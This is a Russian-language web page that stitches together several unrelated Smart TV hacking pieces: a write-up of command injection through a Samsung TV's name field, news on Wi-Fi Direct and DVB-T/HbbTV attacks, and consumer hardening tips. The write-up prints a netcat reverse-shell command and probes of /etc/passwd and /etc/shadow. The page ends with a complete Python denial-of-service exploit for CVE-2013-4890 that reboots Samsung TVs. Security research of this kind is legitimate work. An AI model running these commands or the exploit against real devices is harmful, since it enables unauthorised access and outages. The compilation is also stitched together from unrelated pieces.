Смарт тв самсунг взлом: взлом телевизора и изучение его кишок на примере Samsung LE650B — «Хакер» – Взлом Smart TV через внедрение команд

Содержание

Взлом Smart TV через внедрение команд

Это был один  из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового  дня.

Автор: Sven Morgenroth

Это был один из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового дня. Несмотря на то что чувствовалась усталость, я продолжал размышлять об уязвимости, найденной в роутере, который мне одолжил приятель. Нахождение брешей в подобного рода устройствах всегда является забавным мероприятиям, поскольку вскрываются детали, доступные лишь разработчикам и, возможно, службе технической поддержки.

Поскольку на тот момент я был очень уставшим, то намеревался лишь поставить таймер автоматического выключения и прилечь. Однако во время установки таймера меня заинтересовал вопрос, есть ли скрытые функции в меню настроек телевизора, доступные только разработчикам и службе поддержки. После непродолжительных поисков в Гугле в моем мобильном телефоне я обнаружил, что в этой марке телевизоров предусмотрен код, открывающий скрытое меню.

После повторного открытия настроек я ввел код при помощи пульта управления, и в левом стороне экрана появилось еще одно меню. Практически все категории были недоступны. Я смог только активировать режим «Hotel Mode» и посмотреть версию телевизора.

В тот момент мне захотелось получше узнать свой телевизор. Среди настроек была категория «info», открыв которую я увидел другие номера и версии. Затем мое внимание привлекла возможность, позволяющая назначить имя телевизору.

Уязвимость в Smart TV

При работе в сфере информационной безопасности постоянно приходится тестировать полезные нагрузки в различных полях ввода. К примеру, это может быть параметр GET-запроса, используемого веб-интерфейсом роутера, панели управления нового принтера или, как в моем случае, телевизора. Мне показалось, что будет забавно, если у телевизора будет имя «sleep 5».


Рисунок 1: Параметр для назначения имени телевизору

После ввода полезной нагрузки через пульт управления и сохранения результатов, меню с настройками замерло на некоторое время. Когда телевизор вернулся к жизни я изменил значение параметра, чтобы была возможность добраться до других пунктов меню. В тот момент я еще не догадывался, что нашел нечто похожее на уязвимость, связанную с внедрением команд. На самом деле замирание телевизора на несколько секунд после изменения настроек не являлось чем-то странным. Однако задержка на столь долгое время вызвала у меня любопытство.

Время замирания было намного больше чем 5 секунд. Возможно, все дело было в одиночных кавычках, и телевизор, не ожидая подобных входных данных, выдавал ошибку с целью предотвращения загрузки этих символов. Я попытался повторить эксперимент и ввел `sleep 0`. На этот раз все загрузилось моментально.

Происходило нечто не очень понятное, и я решил измерить время ответа в зависимости от значения параметра функции sleep. Выяснилось, что время замирания меню телевизора всегда в три раза дольше, чем значение этого параметра:

  • sleep (2) — 6 секунд
  • sleep (3) — 9 секунд
  • sleep (5) — 15 секунд

 Запуск команд в телевизоре

Я не мог поверить, что смог внедрить команду после первой же попытки. Замирание меню не было стопроцентным доказательством и в целом не столь полезно, если мы ведем речь об эксплуатации уязвимости. В моем распоряжении был 31 символ (минус две одинарные кавычки), полезная нагрузка должна быть не более 29 знаков.

Ниже показан список команд, которые я пытался запустить в моем телевизоре.  Напротив каждой команды дается пояснение и результат запуска (успешно/неудачно).


Команда

Описание

Количество символов

Успешный запуск

`which nc && sleep 2`

which – команда в Linux, возвращающая путь к приложению (если приложение существует)

&& sleep 2 – заморозка меню на 3*2 секунды, если после выполнение команды which найдена утилита nc (в телевизоре)

19

Да

`which ssh && sleep 2`

Проверка, присутствует ли утилита ssh

20

Нет

`which wget && sleep 2`

Оказалось, что присутствует утилита wget

21

Да

`cat /etc/passwd && sleep 2`

Проверяем, доступен ли файл

/etc/passwd на чтение. Оказалось, что да (было бы очень странно, если нет)

26

Да

`cat /etc/shadow && sleep 2`

Если у нас есть права суперпользователя, файл /etc/shadow доступен на чтение. Проверяем, есть ли у нас права суперпользователя. Однако файл оказался недоступным для чтения.

26

Нет

`ls /etc/shadow && sleep 2`

Получаем объяснение, почему файл /etc/shadow не доступен на чтение. Этого файла не существует.

25

Нет

Далее нужно было подсоединить телевизор к ноутбуку через сетевой кабель, но уже сейчас я был доволен тем, что у меня получалось запускать команды в телевизоре лишь при помощи пульта управления.

Получение доступа к шеллу в телевизоре

Мой телевизор крепится к стене, и подключить сетевой кабель оказалось не так просто, как может показаться на первый взгляд. Преодолев некоторые сложности, мне все же удалось подключить кабель к телевизору с одной стороны и к ноутбуку с другой. Далее при помощи утилиты ipconfig я выяснил IP-адрес ноутбука.


Рисунок 2: Сетевые параметры ноутбука

После выяснения IP-адреса ноутбука мне лишь нужно было организовать обратный шелл. Таким образом, не нужно было знать IP-адрес телевизора. Кроме того, обратный шелл удобен тем, что позволяет обходить любые правила фаервола, которые блокируют входящие соединения. Однако перед тем как начать думать о том, как получить шелл, используя 29 символов, я решил по подробнее изучить систему.

Использование Netcat в телевизоре

После того как выяснилось, что в телевизоре есть утилита nc, я решил перенаправить результаты работы определенных команды через nc на мой ноутбук. Первой командой, естественно, стала id, при помощи которой нужно было выяснить, есть ли у нас права суперпользователя в системе телевизора.

Рисунок 3: Результат выполнения команды id

Как видно из рисунка выше, права суперпользователя у нас есть. Сей факт не столь примечателен, но тем не менее. Далее мне захотелось узнать содержимое корневой директории / при помощи команды `ls -la /|nc 169.254.56.216 5`.


Рисунок 4: Содержимое корневой директории

Отлично. Однако у меня до сих пор не было полноценного шелла для выполнения команд. Все возможные варианты не проходили проверку на длину и были не слишком полезными. Однако поскольку версия nc, установленная в телевизоре, поддерживала флаг –e, мне удалось организовать обратный шелл при помощи команды `nc 169.254.213.210 5 -e sh`.


Рисунок 5: Обратный шелл для выполнения команд в телевизоре

Теперь, когда у меня был полноценный шелл, я захотел увидеть результаты своей работы на экране телевизора. Здесь существует несколько возможностей. Например, смена логотипа при загрузке или изменение иконок приложений. Поскольку у меня был Smart TV, уже было установлено несколько программ, например, Youtube и Skype.


Рисунок 6: Приложение, предустановленные в телевизоре

Я заметил, что большая часть файловой системы была доступна только для чтения, и мне не удалось поменять логотип. Однако там были часто меняющиеся картинки, например, рамки превью, которые можно наблюдать при переключении каналов телевизора. Эти превью содержат снимки программ, идущих в тот момент, когда мы переходим в канал. Совершенно очевидно, что данные картинки сохраняются в месте, доступным для чтения и записи файлов.

Иконки хранились в файлах .png. Для получение полного списка файлов с расширением .png я воспользовался командой find / -name *.png, однако среди результатов не оказалось файлов, имеющих отношения к картинкам превью. Я проделал тот же самый трюк с файлами .jpg и заметил имена наподобие channelImage123.jpg. После загрузки нужных файлов и замены файлов, в имени которых содержится строка channelImage, я получил следующий результат.


Рисунок 7: Экран телевизора с обновленными картинками

Ваш телевизор не настолько умен, как вы думаете

Устройства, подключенные к интернету, могут иметь уязвимости в самых неожиданных местах. Там, где вы ожидаете меньше всего. Когда я тестировал команду sleep, то даже не мог и представить, что мой трюк сработает. Первоначально я решил провести свой эксперимент от скуки. Кроме того, я понятия не имел, что мой телевизор работает по управлением ОС Linux, и был еще больше удивлен, что найденные бреши пригодны к эксплуатации.

Данную уязвимость нельзя эксплуатировать удаленно, хотя что-то подсказывает мне, что я был прав, когда решил не подключать свой телевизор к интернету и не использовал продвинутые функции слишком часто. Я бы не ощущал себя комфортно с мыслью о том, что кто-то может управлять моим телевизором.

Предполагаю, что существует более интересные методы и бреши, пригодные для эксплуатации. Однако, думаю, не стоит добавлять седых волос в том момент, когда телевизор замирает, и ты думаешь, вышло ли устройство из строя или нет. В конце концов, телевизор предназначен для расслабления, а не для повышения кровяного давления, за исключением тех случаев, когда вы смотрите спортивные мероприятия. Например, футбол.

Смарт-телевизоры Samsung можно взломать через уязвимость в Wi-Fi Direct

Эксперты по вопросам безопасности из Neseso бьют тревогу относительно обнаруженной ими уязвимости в смарт-телевизоре Samsung, которую в самой компании отказались исправлять.

Уязвимость в системе безопасности связана с работой системы Wi-Fi Direct – стандарта Wi-Fi, который даёт возможность различным устройствам связываться между собой без необходимости использования точки беспроводного доступа.

Компания Smasung использует функцию Wi-Fi Direct для прямого подключения к смарт-телевизорам через мобильные телефоны, лэптопы, планшеты, минуя локальную точку доступа.

Смарт-телевизоры Samsung используют MAC-адреса для аутентификации

Эксперты из Neseso утверждают, что компании Samsung не удалось внедрить данный стандарт, поскольку телевизоры производства компании лишь используют MAC-адреса для аутентификации пользователей. Другие производители используют более надёжные системы аутентификации, основанные на нажатии кнопки (Push-Button) или введении PIN.

Тот факт, что каждый способен определять и подделывать MAC-адрес, говорит о том, что данная уязвимость открывает возможность взлома телевизора перед любым злоумышленником, находящимся в радиусе действия системы Wi-Fi Direct.

«После подключения к смарт-телевизору, злоумышленник получает доступ ко всем его функциям – таким, как служба удалённого управления и зеркальное отображение экрана DNLA», – пишут эксперты Neseso в своём отчёте.

Смарт-телевизоры можно будет использовать в качестве «точек входа» для других атак

Эксперты также утверждают, что злоумышленник может использовать доступ к телевизору в качестве точки входа в частную сеть пользователя или компании. Злоумышленник также может использовать учётную запись для сети Wi-Fi, к которой подключен телевизор, и атаковать другие устройства, находящиеся в ней.

Данная угроза вполне реальна для компаний, поскольку многие из них имеют смарт-телевизоры в своих офисах, комнатах для отдыха персонала и комнатах для заседаний.

Читайте также: Smart-шпионаж от Samsung

Самым ужасным в этой истории является тот факт, что в смарт-телевизорах производства компании Samsung функция Wi-Fi Direct активируется по умолчанию при каждом включении устройства. Пользователи видят на экранах уведомления о подключении к телевизору через службу Wi-Fi Direct устройств, внесённых в «белый список». Однако, данные уведомления могут быть неверно поняты владельцами телевизоров либо вообще остаться незамеченными в случае, если никто не смотрит телевизор в данный момент.

В Samsung не видят «угрозы для безопасности»

В середине марта эксперты из Neseso обратились в компанию Samsung с сообщением о выявленной уязвимости, однако в компании ответили, что не видят в данной уязвимости серьёзной угрозы для безопасности устройств, отказавшись выпускать обновление программного обеспечения.

В процессе изучения уязвимости эксперты из Neseso использовали версию 1480 прошивки UN32J5500 от Samsung, однако, по их мнению, другие версии прошивки также находятся в зоне риска. В настоящее время единственным способом защиты от таких атак является ручное принудительное отключение данной функции при каждом включении или перезагрузке устройства.

В апреле на Саммите экспертов безопасности 2017 эксперт Амихай Найдерман сообщил о наличии 40 нулевых уязвимостей в системе Tizen – операционной системе, которая обеспечивает работу смарт-телевизоров Samsung. На тот момент не было решений, направленных на ликвидацию данных уязвимостей.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Понравилось нас читать?
Подпишись тут

Хакеры научились взламывать Smart TV при просмотре телеэфира

До сих пор считалось, что для настройки удалённого доступа к чужому смарт-телевизору злоумышленнику требовалось получить к нему физический доступ для установки вредоносного приложения с USB-носителя. Или обманным путём заставить установить его самого владельца. Однако в швейцарской компании Oneconsult, специализирующейся на вопросах кибербезопасности, разработали новый метод — взлом устройства посредством вещания DVB-T, который применим к 90 % современных Smart TV.

Автором данного способа является исследователь Рафаэль Шиль (Rafael Scheel), по словам которого, в основе нового типа атаки лежит стандарт HbbTV. В мирных целях он служит для предоставления зрителю дополнительной информации из Интернета во время просмотра ТВ-передач. Если же речь идёт о преступных намерениях, то использование этой технологии, поддерживаемой всеми современными «умными» телевизорами, позволяет хакеру дать команду на загрузку определённого сайта с предварительно внедрённым в него вредоносным кодом. Что будет потом, догадаться несложно: атакующий может следить за пользователем, установить полный контроль над устройством и задействовать его для проведения DDoS-атак.

Что немаловажно, для проведения данной атаки не требуется дорогостоящее оборудование — достаточно будет приобрести комплект для трансляции DVB-T за $50–150. Чтобы ТВ-приёмник настроился именно на его сигнал, а не сигнал оператора, который априори мощнее, от злоумышленника требуется установить передатчик как можно ближе к «жертве», но не обязательно в том же помещении. Это может быть соседнее здание, или же оборудование может быть размещено на беспилотном летательном аппарате. Иными словами, физическое подключение к устройству и контакты с его владельцем не требуются. К тому же, отследить такие атаки крайне затруднительно ввиду того, что стандарт DVB-T подразумевает только одно направление потока данных — от передатчика к приёмнику.

Теоретически, аналогичные методы взлома могут быть применены и к другим технологиям цифрового телевещания — например, DVB-C или IPTV. Просто на сегодняшний день в Oneconsult опробованы только эксплойты для DVB-T. Их, кстати, создано два — один эксплуатирует уязвимость CVE-2015-3090 в Flash Player, другой ищет «дыру» в функции JavaScript Array.prototype.sort(). Разумеется, эти эксплойты разработаны исключительно в исследовательских целях. Более того, первый из них не представляет реальной угрозы, поскольку браузеры большинства современных Smart TV не поддерживают Flash; второй же задействует старую уязвимость. Впрочем, это не означает, что хакеры не найдут новые лазейки, да и обновления прошивок для смарт-ТВ выходят порой не так часто, как хотелось бы.

Если вы заметили ошибку — выделите ее мышью и нажмите CTRL+ENTER.

Как сделать новый Smart TV максимально безопасным

Продолжается пора предпраздничных скидок, и немало людей используют эту возможность, чтобы поменять старый телевизор на модель поновее. И почти наверняка она оснащена функцией Smart TV — которая не только даёт доступ к дополнительному контенту, но и ставит безопасность под угрозу. Конечно, взломанный телевизор звучит как история из криминальной драмы — но подобное действительно происходит с умной техникой.

В колонке Inc.com даже приводится предупреждение от ФБР: «Помимо того, что производитель телевизора и разработчики ПО могут прослушивать вас и получать видео с камеры, телевизор также может дать хакеру доступ к другой технике в доме.» В статье также приводятся советы, как обеспечить безопасность Smart TV — приводим самое важное.

Следите за безопасностью учётных записей

Как сделать телевизор с функцией Smart TV максимально безопаснымunsplash.com

Самое ценное, что может получить злоумышленник, помимо доступа к другой технике в вашем доме — данные из приложений и сервисов. Вот что можно сделать для их защиты:

  • Установите двухфакторную аутентификацию во всех приложениях и сервисах, которые это позволяют. Если такой возможности нет, убедитесь, что система будет запрашивать пароль для каждого входа в сеть и подтверждения всех покупок.
  • По возможности не используйте на телевизоре приложения, у которых есть ваши персональные или платёжные данные. Потому что давайте будем честны: вам не так уж сильно нужно листать ленту Твиттера на 50-дюймовом экране.
  • Если это возможно, сделайте для телевизора отдельные учётные записи.
  • Не сохраняйте пароли на телевизоре. Да, вводить их каждый раз может быть нудно, но безопасность того стоит.

Всегда устанавливайте обновления для прошивки и приложений на телевизоре

Если вы не уверены, как это делать — проверьте инструкцию: на устройствах разных производителей процесс может отличаться. Если такая опция есть, лучше включить автоматическое обновление программ и системы — потому что даже 10 приложений регулярно обновлять вручную может быть крайне неудобно. Помните: каждый раз, когда вы откладываете обновление, вы можете оставить свою технику незащищённой от уязвимостей, которые закрыли в более новой версии.

Отключите или закройте камеру и микрофон

Получить доступ к камере или микрофону телевизора проще всего — при этом для злоумышленника эти данные могут представлять большую ценность. При этом большинство пользователей всё равно не пользуется возможностью звонить по Skype через телевизор. Если вы в их числе, отключите камеру и микрофон через настройки. Если по какой-то причине сделать это не удалось, ФБР рекомендует заклеить камеру.

Не используйте смартфон вместо пульта

Как сделать телевизор с функцией Smart TV максимально безопаснымunsplash.com

Да, иногда это бывает очень удобно, но связь между смартфоном и Smart TV может скомпрометировать оба устройства: достаточно будет взломать одно из них, чтобы получить доступ к обоим. Лучше пользоваться старым добрым пультом.

Позаботьтесь о безопасности домашней сети

Надёжная защита домашней сети — лучшая забота о безопасности всех подключённых к ней устройств, и речь не только о телевизоре, но и о роутере, умной технике и других приборах. Подробнее о том, как защитить свою Wi-Fi-сеть и роутер, читайте в нашей статье.

Читайте также 🧐

Действительно ли возможен взлом телевизоров samsung smart tv

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem — @MME_IT —

Скрыто от гостей


# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:

Скрыто от гостей


# P.O.C => #
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots…
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware
#
###

# —————————-
# import dependencies
# —————————-
import httplib
import time
import sys
import os
import time

# —————————-
# script colorize output
# —————————-
BLUE = ‘\033[94m’
RED = ‘\033[91m’
GREEN = ‘\033[32m’
WHITE = ‘\033[0m’
ORANGE = ‘\033[33m’

# —————————-
# exploit banner
# —————————-
print BLUE+»**************************************************************»
print WHITE+» Author: Malik Mesellem — @MME_IT —

Скрыто от гостей

«
print WHITE+» Exploit: Denial of Service (DoS) attack»
print WHITE+» module by: pedr0 ubuntu aka r00t-3xp10it»
print «»
print WHITE+» Description:»
print WHITE+» The web server (DMCRUIS/0.1) on port TCP/5600″
print WHITE+» is crashing by sending a long HTTP GET request.»
print WHITE+» Tested successfully on my Samsung PS50C7700 plasma TV «
print BLUE+»**************************************************************»

# —————————-
# Sends the payload
# —————————-
print «»
print BLUE+»[*]»+GREEN+» press ctrl+z to stop»
print BLUE+»[*]»+WHITE+» Sending the malicious payload…»
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request(«GET», «A»*300)
conn.close()

# —————————-
# Checks the response
# —————————-
print BLUE+»[*]»+WHITE+» Checking the status…»
response = 0
while response == 0:
response = os.system(«ping -c 1 » + sys.argv[1] + «> /dev/null 2>&1»)
if response != 0:
print BLUE+»[*]»+GREEN+» (Success):»+RED+» the target seems to be down !!!»
print WHITE+»»
time.sleep(10)

Smart TV под угрозой: как взламывают современные телевизоры

Наверх
  • Рейтинги
  • Обзоры
    • Смартфоны и планшеты
    • Компьютеры и ноутбуки
    • Комплектующие
    • Периферия
    • Фото и видео
    • Аксессуары
    • ТВ и аудио
    • Техника для дома
    • Программы и приложения
  • Новости
  • Советы
    • Покупка
    • Эксплуатация
    • Ремонт
  • Подборки
    • Смартфоны и планшеты
    • Компьютеры
    • Аксессуары
    • ТВ и аудио
    • Фото и видео
    • Программы и приложения
    • Техника для дома
  • Гейминг
    • Игры
    • Железо
  • Еще
    • Важное
    • Технологии
    • Тест скорости

Leave a comment